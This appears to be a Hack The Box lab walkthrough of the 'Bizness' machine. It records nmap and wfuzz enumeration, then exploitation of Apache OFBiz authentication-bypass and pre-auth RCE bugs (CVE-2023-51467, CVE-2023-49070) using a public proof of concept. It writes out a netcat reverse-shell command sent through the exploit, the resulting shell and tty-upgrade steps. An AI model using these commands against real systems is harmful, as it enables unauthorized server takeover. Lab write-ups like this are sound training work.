=======================================================================
Initial Information:
=======================================================================We define environment variables to work and execute scans using those variables
❯ target1 Por favor, ingresa la nueva dirección IP de destino: 10.10.11.252 ❯ htp bizness Definiendo las siguientes variables: export htf="/home/ass/Documents/GitHub/4rji/4rjinotes/htb/bizness/bizness.md" export htcon="/home/ass/Documents/GitHub/4rji/4rjinotes/htb/bizness" export ip="10.10.11.252"
"We perform a basic scan."
# Nmap 7.94SVN scan initiated Sun May 26 23:28:36 2024 as: nmap -sCV -p 22,80,443,45177 -oN expo3 10.10.11.252
Nmap scan report for 10.10.11.252
Host is up (0.59s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp open ssl/http nginx 1.18.0
| tls-alpn:
|_ http/1.1
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
45177/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 26 23:29:17 2024 -- 1 IP address (1 host up) scanned in 40.86 seconds"Nmap reports no traffic redirection to the page, so we add the domain to /etc/hosts using the hosthtb script."
❯ hosthtb bizness.htb Se ha agregado "10.10.11.252 bizness.htb" al archivo /etc/hosts. cat /etc/host 10.10.11.252 bizness.htb
=======================================================================
Enumeration
=======================================================================Apache OFBiz Authentication Bypass Vulnerability
"By finding the technology of the website, we can see that it is vulnerable to Apache OFBiz Authentication bypass."
wfuzz -c --hc 404,302 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt "https://bizness.htb/FUZZ" /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly w> ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: https://bizness.htb/FUZZ Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload > ===================================================================== 000000012: 200 522 L 1736 W 27200 Ch "# on at least 2 different hosts" > 000000002: 200 522 L 1736 W 27200 Ch "#" > 000000006: 200 522 L 1736 W 27200 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this" > 000000004: 200 522 L 1736 W 27200 Ch "#" > 000000005: 200 522 L 1736 W 27200 Ch "# This work is licensed under the Creative Commons" > 000000007: 200 522 L 1736 W 27200 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/" > 000000014: 200 522 L 1736 W 27200 Ch "https://bizness.htb/" > 000000013: 200 522 L 1736 W 27200 Ch "#" > 000000003: 200 522 L 1736 W 27200 Ch "# Copyright 2007 James Fisher" > 000000010: 200 522 L 1736 W 27200 Ch "#" > 000000008: 200 522 L 1736 W 27200 Ch "# or send a letter to Creative Commons, 171 Second Street," > 000000009: 200 522 L 1736 W 27200 Ch "# Suite 300, San Francisco, California, 94105, USA." > 000000011: 200 522 L 1736 W 27200 Ch "# Priority ordered case-sensitive list, where entries were found" > 000000001: 200 522 L 1736 W 27200 Ch "# directory-list-2.3-medium.txt" > 000002332: 200 491 L 1596 W 34632 Ch "control" > ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests... Total time: 105.2991 Processed Requests: 17091 Filtered Requests: 17076 Requests/sec.: 162.3089
"We notice that the only difference in terms of word count is 'control'. We observe this by comparing lines and words in the title."
"We visit /control but find nothing. So, we perform another FUZZ because it seems to be a directory. This time, we hide --hw=1596 to reduce the noise from repeated pages."
wfuzz -c --hc=404,302 --hw=1596 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt "https://bizness.htb/co> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly w> ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: https://bizness.htb/control/FUZZ Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000077: 200 140 L 496 W 9308 Ch "main" 000000138: 200 140 L 496 W 9308 Ch "view" 000000061: 200 179 L 580 W 10756 Ch "help" 000000053: 200 185 L 598 W 11060 Ch "login" 000001225: 200 179 L 580 W 10756 Ch "logout" 000003032: 200 140 L 496 W 9308 Ch "views" /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests... ^C Total time: 0 Processed Requests: 3415 Filtered Requests: 3409 Requests/sec.: 0
"We found the login page."
The default passwords didn't work. (admin - ofbiz)
Now that we've found the login, we search for a way to exploit it. We found a GitHub repository that allows us to do so. This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz.
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
jakabakos/Apache-OFBiz-Authentication-Bypass Public
CVEs
First, we will investigate what these CVEs are about.
-
CVE-2023-51467
CVE-2023-51467 is a critical security vulnerability affecting Apache OFBiz, a Java-based enterprise resource planning (ERP) system. This vulnerability allows attackers to bypass authentication mechanisms, leading to potential server-side request forgery (SSRF) and remote code execution (RCE). The vulnerability has been rated with a high severity score of 9.8 on the CVSS scale.
-
CVE-2023-49070
CVE-2023-49070 is a critical pre-authentication remote code execution (RCE) vulnerability affecting Apache OFBiz versions prior to 18.12.10. This vulnerability arises from the presence of an outdated and unmaintained XML-RPC component in Apache OFBiz. Exploiting this flaw, an attacker can execute arbitrary code on the affected server without requiring authentication, granting them full control over the server. This could lead to data theft, operational disruption, or further attacks on the organization's network.
=======================================================================
Post Exploitation
=======================================================================We clone the repository and use the first script to see if it is exploitable.
-
1
xdetection.py
❯ python3 xdetection.py --url https://bizness.htb [+] Scanning started... [+] Apache OFBiz instance seems to be vulnerable.
-
2
CMD - We send a command, in this case a ping to our machine, to see if we receive it and test if we can inject commands.
python3 exploit.py --url https://bizness.htb --cmd 'ping -c 1 10.10.14.1' [+] Generating payload... [+] Payload generated successfully. [+] Sending malicious serialized payload... [+] The request has been successfully sent. Check the result of the command.
-
3
We listen with tcpdump and indeed receive the ping.
sudo tcpdump -i tun0 tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 23:57:25.852958 IP 10.10.14.11 > 10.10.14.1: ICMP echo request, id 8978, seq 1, length 64 23:57:26.095255 IP 10.10.14.1 > 10.10.14.11: ICMP echo reply, id 8978, seq 1, length 64
-
4
Now we will send a connection with nc (netcat).
python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash 10.10.14.11 8080' [+] Generating payload... [+] Payload generated successfully. [+] Sending malicious serialized payload... [+] The request has been successfully sent. Check the result of the command. nc -nlvp 8080 listening on [any] 8080 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.11.252] 43186 whoami ofbiz
-
5
We will create an interactive shell.
-
5.1
script /dev/null -c bash ^Z stty raw -echo; fg [1] + 212494 continued nc -nlvp 8080 reset xterm -
5.2
Finally, we adjust the size of the tty.
export TERM=xterm-256color # In our Terminal: stty size 19 120 # Back to the box ofbiz@bizness:/opt/ofbiz$ stty rows 19 cols 120
-
5.1
[+] PrivEsc Notes:
[+] System Enumeration:
- Host:
- Compilation version and architecture:
[+] List Interesting Directories:
- /tmp
- /opt
- /var/tmp
- /dev/shm
- /var/backups/
- /var/mail